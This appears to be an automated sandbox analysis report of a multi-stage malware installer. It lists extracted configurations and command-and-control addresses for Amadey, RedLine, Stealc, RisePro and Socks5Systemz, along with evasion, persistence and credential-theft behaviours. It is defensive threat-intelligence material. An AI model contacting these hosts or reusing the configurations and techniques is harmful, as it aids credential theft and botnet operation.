amadey | e05339d69a421e810a5495535f52a3ff1daf6a03c5d24108ee275820a4312aa3

Analysis

max time kernel
1200s
max time network
1201s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1719422619.8807507_setup.exe
Size

4.3MB
MD5

f5c0640ab25b992acfc6af0a3786a009
SHA1

b6faf5321a61d2f52ee835d7da1a50f451fe9dfa
SHA256

e05339d69a421e810a5495535f52a3ff1daf6a03c5d24108ee275820a4312aa3
SHA512

7c3bcfbf0d1f459d660da79a95ecf07cda45f636659c05e579d4858d89c00dea1dfe937bd79566082dfcbcd9798b8ece5df662a6704c7a684648b138eff90cea
SSDEEP

98304:W+4KsuX9weOTFV1soCftKVZ9gB5wQnb1aH0IEOJL9eFmB:frCFAOLgB59bEEOJLoFA

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.92:27953

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

Extracted

Family

risepro

191.101.209.39

5.42.66.10

Extracted

Family

socks5systemz

ejrwcev.ua

http://ejrwcev.ua/search/?q=67e28dd86c08f72b460daf4c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ee8889b5e4fa9281ae978a271ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ff615c2ed9d9b3c

http://ejrwcev.ua/search/?q=67e28dd86c08f72b460daf4c7c27d78406abdd88be4b12eab517aa5c96bd86ee908749845a8bbc896c58e713bc90c91b36b5281fc235a925ed3e01d6bd974a95129070b616e96cc92be510b866db52b2e34aec4c2b14a82966836f23d7f210c7ee9c9e39cf679711

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	1719422619.8807507_setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/852-407-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	HCAEBFBKKJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	R_sWfKbdnDIPflC0DERt7gFw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
230	2236	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4940	powershell.exe
232	powershell.EXE
1988	powershell.exe
1204	powershell.exe
3352	powershell.exe
4520	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0007000000023420-114.dat	net_reactor
behavioral1/memory/1284-175-0x00000000002E0000-0x000000000071C000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 44 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	R_sWfKbdnDIPflC0DERt7gFw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HCAEBFBKKJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	R_sWfKbdnDIPflC0DERt7gFw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HCAEBFBKKJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	explortu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	qEOazug.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	1719422619.8807507_setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	vN2Fx_IOTbgMowts5MmYC7ix.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	HCAEBFBKKJ.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	R_sWfKbdnDIPflC0DERt7gFw.exe

Executes dropped EXE 41 IoCs

pid	Process
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
676	ehxtKGTOWlREU5aG0RQfu9Ag.exe
2128	R_sWfKbdnDIPflC0DERt7gFw.exe
540	F3G_EO4KQh4oWKWb0bXe7vmo.exe
392	T1XdsqWBVHThKRY6KT4OUjyc.exe
3804	r67rDvPigX7qOQOkmYNaj_9T.exe
1284	i0JJithUZkia7pknf7CtIhgb.exe
4052	EF9AiWf4dZ3QMKewGiYgX74X.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
844	r67rDvPigX7qOQOkmYNaj_9T.tmp
5164	Install.exe
5424	audionormalizer32_64.exe
5512	audionormalizer32_64.exe
5500	Install.exe
6060	HCAEBFBKKJ.exe
2176	explortu.exe
228	IEBFHCAKFB.exe
3456	eqtpkqwqodik.exe
5636	5e0951ecbc.exe
5480	BKJKEBGDHD.exe
5404	KEBGHCBAEG.exe
1984	Install.exe
5400	explortu.exe
5440	qEOazug.exe
2316	explortu.exe
2136	explortu.exe
3788	explortu.exe
5672	explortu.exe
4100	explortu.exe
3436	explortu.exe
5532	explortu.exe
5600	explortu.exe
6056	explortu.exe
3168	explortu.exe
180	explortu.exe
3440	explortu.exe
5916	explortu.exe
1880	explortu.exe
1172	explortu.exe
5860	explortu.exe
4760	explortu.exe

Identifies Wine through registry keys 2 TTPs 20 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	HCAEBFBKKJ.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explortu.exe

Loads dropped DLL 4 IoCs

pid	Process
844	r67rDvPigX7qOQOkmYNaj_9T.tmp
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
2236	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2128-174-0x0000000000340000-0x0000000000EFA000-memory.dmp	themida
behavioral1/files/0x0007000000023417-157.dat	themida
behavioral1/memory/2128-719-0x0000000000340000-0x0000000000EFA000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	R_sWfKbdnDIPflC0DERt7gFw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	R_sWfKbdnDIPflC0DERt7gFw.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	qEOazug.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	qEOazug.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
108	iplogger.org
109	iplogger.org

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ipinfo.io
15	ipinfo.io
372	ipinfo.io
373	ipinfo.io
11	api.myip.com
12	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5492	powercfg.exe
2304	powercfg.exe
5248	powercfg.exe
1312	powercfg.exe
4948	powercfg.exe
5116	powercfg.exe
2668	powercfg.exe
5292	powercfg.exe

Drops file in System32 directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	qEOazug.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	qEOazug.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	qEOazug.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	qEOazug.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	qEOazug.exe
File opened for modification	C:\Windows\System32\GroupPolicy	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	qEOazug.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	qEOazug.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	qEOazug.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

pid	Process
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
2128	R_sWfKbdnDIPflC0DERt7gFw.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
6060	HCAEBFBKKJ.exe
2176	explortu.exe
5636	5e0951ecbc.exe
5400	explortu.exe
2316	explortu.exe
2136	explortu.exe
3788	explortu.exe
5672	explortu.exe
4100	explortu.exe
3436	explortu.exe
5532	explortu.exe
5600	explortu.exe
6056	explortu.exe
3168	explortu.exe
180	explortu.exe
3440	explortu.exe
5916	explortu.exe
1880	explortu.exe
1172	explortu.exe
5860	explortu.exe
4760	explortu.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 540 set thread context of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 676 set thread context of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 1284 set thread context of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 3456 set thread context of 3744	3456	eqtpkqwqodik.exe	186
PID 3456 set thread context of 3684	3456	eqtpkqwqodik.exe	188
PID 5480 set thread context of 1652	5480	BKJKEBGDHD.exe	192
PID 392 set thread context of 2340	392	T1XdsqWBVHThKRY6KT4OUjyc.exe	196
PID 5404 set thread context of 4528	5404	KEBGHCBAEG.exe	198

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\bbrFONm.xml	qEOazug.exe
File created	C:\Program Files (x86)\LUWSYkNLogUn\gNKuewB.dll	qEOazug.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	qEOazug.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	qEOazug.exe
File created	C:\Program Files (x86)\RgdiTWAdU\oRPOzim.xml	qEOazug.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\Kphysge.dll	qEOazug.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	qEOazug.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\mYbGFXivyoAlm.dll	qEOazug.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\DCgEppn.dll	qEOazug.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\hWdIJCd.xml	qEOazug.exe
File created	C:\Program Files (x86)\RgdiTWAdU\YGXvol.dll	qEOazug.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	qEOazug.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	qEOazug.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\pDNKTqh.xml	qEOazug.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bjeWJKrHnPpdAGCduF.job	schtasks.exe
File created	C:\Windows\Tasks\explortu.job	HCAEBFBKKJ.exe
File created	C:\Windows\Tasks\zjtCPqTOixnxYITTP.job	schtasks.exe
File created	C:\Windows\Tasks\gwLAkOfFqvEnRPY.job	schtasks.exe
File created	C:\Windows\Tasks\mFeioppqsVnzBGRpZ.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5796	sc.exe
5360	sc.exe
3900	sc.exe
5800	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
5316	228	WerFault.exe	157
5916	5480	WerFault.exe	181
4652	5404	WerFault.exe	195
5904	1984	WerFault.exe	205
5400	5500	WerFault.exe	116
5708	5440	WerFault.exe	296

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vN2Fx_IOTbgMowts5MmYC7ix.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vN2Fx_IOTbgMowts5MmYC7ix.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2384	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
